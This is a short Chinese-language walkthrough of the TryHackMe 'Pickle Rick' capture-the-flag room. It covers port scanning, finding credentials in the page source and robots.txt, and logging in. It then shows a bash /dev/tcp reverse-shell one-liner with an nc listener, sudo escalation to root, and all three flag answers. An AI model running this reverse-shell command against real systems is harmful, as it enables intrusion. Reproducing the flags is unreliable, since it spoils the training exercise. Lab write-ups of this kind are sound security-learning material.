今天來解的題目比較不是尋找公開 Exploit 的方式，而是要靠自己在網頁上尋寶(?)，來取得進一步的權限，也比較像 CTF 通靈的題目。

• 網址：https://tryhackme.com/room/picklerick
• IP ： 10.10.223.99

掃 Port

• nmap -A 10.10.223.99
  • 
  • 22 port
  • 80 port

觀察網頁

• 觀察首頁原始碼
  • 
  • 提示 username : R1ckRul3s
• 觀察 robots.txt
  • 
  • Wubbalubbadubdub
  • 發現有一段可能是密碼的字串(?)

Login

• 在網址後面加上 /login.php 就可以進入登入
  • 
  • 使用 Username : R1ckRul3s
  • Password : Wubbalubbadubdub

Webshell

• 進入後就是一個 webshell
  • 戳成 reverse shell
    • bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
    • 本地端輸入 nc -vlk 7877
    • 就能拿到 shell 了
• Flag1
  • 
  • 在 web 目錄
  • mr. meeseek hair
• Flag2
  • 
  • 在 rick 家目錄
  • 1 jerry tear
• Flag3
  • 
  • 發現可以直接 sudo su
  • 所以就進 root 取得最後一個 flag
  • fleeb juice